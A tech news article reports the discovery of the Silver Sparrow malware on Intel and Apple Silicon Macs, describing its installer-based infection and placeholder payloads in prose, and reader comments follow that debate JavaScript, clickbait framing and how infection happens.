Mysterious malware infecting Apple Silicon Macs has no payload - yet

Posted:
in macOS edited February 2021
More malware affecting Apple Silicon Macs has been uncovered, but researchers have spotted that it is lacking a malicious payload, for the moment.




It seems that there may be more malware aimed at Apple's M1-based Macs than previously thought. Following the initial reports of the first M1 malware found in the wild, it seems that there are more infections of malware, but of a particularly toothless variety.

Early in February, researchers from Red Canary discovered a strain of macOS malware that used LaunchAgent to make its presence, much like some other forms of malware. What was of interest to the researchers was that the malware behaved differently from typical adware, due to how it used JavaScript for execution.

The malware cluster, named by the researchers as "Silver Sparrow," also involved a binary compiled to work with M1 chips. This made it malware that would potentially target Apple Silicon Macs.

Further research from researchers at VMware Carbon Black and Malwarebytes determined it was likely that Silver Sparrow was a "previously undetected strain of malware." As of February 17, it had been detected in 29,139 macOS endpoints across 153 countries, with the bulk of infections residing in the US, the UK, Canada, France, and Germany.

At the time of publication, the malware hasn't been used to deliver a malicious payload to victim Macs, though that could change in the future. Due to the compatibility with M1, the "relatively high infection rate" and the operational maturity of the malware, it was deemed to be a serious enough threat that is "uniquely positioned to deliver a potentially impactful payload at a moment's notice," prompting a public disclosure.

Two versions of the malware were discovered, with one version's payload consisting of a binary affecting Intel-based Macs only, while the other was a binary that was compiled for both Intel and M1 architectures. The payload is seemingly a placeholder, as the first version opens a window that literally says "Hello, World!" and the second states "You did it!"

An example of the included binary [via Red Canary]
An example of the included binary [via Red Canary]


If it were malicious malware, the payload could potentially allow the same or similar payload instructions to affect both architectures from a single executable.

The mechanism for the malware worked around files titled "update.pkg" and "updater.pkg," taking the guise of installers. They take advantage of the macOS Installer JavaScript API to execute the suspicious commands.

This is a behavior that is sometimes seen with legitimate software and not malware, which usually uses preinstall or post-install scripts for command execution.

Once successful, the infection attempts to check a specific URL for a downloadable file, which could contain further instructions or a final payload. A week of monitoring the malware resulted in no visible final payload being made available, which could still change in the future.

There are multiple questions left unanswered to the researchers about Silver Sparrow. These include where the initial PKG files came to be used for infecting systems, and elements of the malware's code that seems to be part of a wider toolset.

"The ultimate goal of this malware is a mystery," Red Canary admits. "We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution."

There is also the question of the inclusion of the "Hello World" executables, as the binary won't run unless a victim actively searched for it and ran it, rather than running automatically. The executables suggest this could be an under-development malware, or that an application bundle was needed to make the malware seem legitimate to other parties.

Comments

  • Reply 1 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.
    longpath
  • Reply 2 of 14
    Every article about how M1 is now a malware target is stupid clickbait. In none of these cases is the M1 chip exhibiting a vulnerability, other than macOS’ ability to cause code to be run upon it. It’s macOS that’s suffering the vulnerability, the same macOS that also runs on Intel. A compiler target architecture is not remotely the same thing as a exploitable hardware target. It’s just a command line flag. It can’t possibly be news that a malware author changed a compiler flag — xCode practically begs all developers to also target Apple Silicon. Apple never implied the M1 would be in any way more resistant to malware than Intel processors, and they bent over backward to make sure Intel code could run along side natively compiled M1 code to make the processor as irrelevant as possible. Please be responsible journalists and just write a single article stating the M1 is no more or less vulnerable to malware, and leave these “Apple Silicon vulnerability“ framings to less reputable blogs.
    edited February 2021 rrabuwookie01macplusplusemoellerbageljoeyjony0watto_cobra
  • Reply 3 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.

    JavaScript isn’t the issue here. It’s an incidental bystander to the crime. The installer package happens to (reasonably) allow scripts to be run as part of the install/cleanup process. Crucially, it could have been Apple Script or a bash script and done the exact same thing. The user that runs the .pkg installer file is the weak link, the insecurity, as they allowed an unsafe application to have control of their system. An installer is a foreign executable, regardless of the language in which it’s code is written. At no point is the JavaScript doing something it wasn’t permitted to do by the user or the system.

    Flash had myriad exploitable vulnerabilities, where unauthorized code could break free of Flash’s constraints, escalate privilege and run on the native system. This isn’t like that. Particular JavaScript virtual machines/interpreters may have similar vulnerabilities, but this isn’t one of those cases. This is more like welcoming the bad guys in directly.
    edited February 2021 rrabumuthuk_vanalingamjony0watto_cobraasdasd
  • Reply 4 of 14
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    commentzillaPetrolDavelongpathwatto_cobra
  • Reply 5 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    Exactly. After scaring the shit out of everyone it would be great if AI would provide clear information on how to detect and remove it. Even over at Ars Techinca they’re being lazy by just pointing to the research’s website, which may be too technical for most people to wade through.
    PetrolDavelongpathwatto_cobra
  • Reply 6 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    It may be easy to detect. Look at your Downloads folder. If you have the habit of frequently visiting piracy and other dark sites, you may find plenty of .zip, .pkg and .dmg files in that folder. Although Safari no longer downloads anything automatically, an explicit permission given by the user to download from "that site" will still do it. If the "Open safe files after downloading" option is active in Safari then the malware installer will also launch automatically. 

    Besides that, looking for some exotic and mysterious methods of contamination wouldn't help much. Malware in macOS spreads almost always through the weakest link in the security chain: the user.
    edited February 2021 jdb8167watto_cobra
  • Reply 7 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.
    Java is more secure than C/C++ but that wasn't the reason it was created (which was to achieve platform-agnostic code for the web). Javascript was never created for security at all. It was created solely to make web browsers/websites interactive. Security was never a consideration and efforts to make Javascript more secure came down the line. However, there are so many known security issues in Javascript because it is so widespread ... in terms of end user interaction the most popular in the world by far. Makes it a huge target so naturally everyone with a bow and arrow is going to take their shot.
  • Reply 8 of 14
    I'm not infected. I'm guessing it's related to a Flash update! Gotta update Flash!  :D
    watto_cobra
  • Reply 9 of 14
    tobiantobian Posts: 148member
    Toothless Intel investing in down-punching further? Perhaps it’s less expensive, than research better CPUs?
    watto_cobra
  • Reply 10 of 14
    In my opinion ,from Intel chips made in US, EU or Middle East Foundries , I would only use the chips made in US or EU , since Intel is in the deep hole it is right now due to the Middle East "advisers" spending ~$25 billion from 2016 to today with near nothing showing for it except luxury condos , yachts , jets & sports cars in the Middle East .....and oh yes ! malware loaded chips . Let's hope the new Intel team turns around the ship fast & smart towards Holograms ,Augmented Reality, Neurons ,Hydrogen & Plasma & Gravity , etc.
    watto_cobra
  • Reply 11 of 14
    I would only use the chips made in US or EU 
    I would try to avoid all products made in dictatorships. Not just computer chips, but potato chips, cars, cutlery and everything else. I always look on the labels of products, and am always happy to pay more for products made where people are free and human rights are honoured. It's not always easy or possible to do this, however, for several reasons, including the fact that some products have components from a variety of countries, and also because it can be hard to distinguish between a company's HQs location and its employee's or contractor's locations.

    People would be surprised to learn how many food products come from China, for example. And the law in Canada says that a food product can be labelled "made in Canada" if at least 51% of the price of the final product was spent in Canada. The loophole is that that price includes the price of the packaging. So in many cases food that is grown in China is labelled "made in Canada".

    In my life I have never yet met another person who shares this value of mine. I've heard many people who take pride in buying products from their own country, but never people who take pride in buying from "free countries." So I'm braced for a lot of critics here.
    longpath
  • Reply 12 of 14
    Having 'known' malware covered in the press as a point of concern would be a real luxury in PC-land.

    Microsoft I believe see 94% of threats once. For Windows it's all about protection against software vulnerabilities and zero-day.

    There is feedback from VMWare and MalwareBytes so it's clearly a known threat in the AV vendor community.

    All this really is then is a reminder to macOS owners (including myself) that they need some form of decent malware protection now.

    History has shown us that trusting hardware and OS vendors exclusively is insufficient.


    watto_cobra
  • Reply 13 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    The article has an easily missed link (it took me three passes, while looking for it) to the researcher’s article, which finally gets around to those details:

    https://redcanary.com/blog/clipping-silver-sparrows-wings/
    edited February 2021 watto_cobra
  • Reply 14 of 14
    asdasdasdasd Posts: 5,686member
    The M1 mention is mostly clickbait as this kind of exploit works on many macs. 

    To get infected you have to: 

    1) not download from the App Store exclusively. 
    2) accept random downloads from a website or turn the option for auto download from that specific website. 
    3) turn on auto Lauch for that website or go to the downloads folder and double click the pkg
    4) even then it won’t work unless you have disabled security settings to allow any application to launch, as opposed to App Store or known developers. You can only do this on an m1 (big sur) Mac via the command line. 

    This is no threat to normal users. How did it even spread? 
Sign In or Register to comment.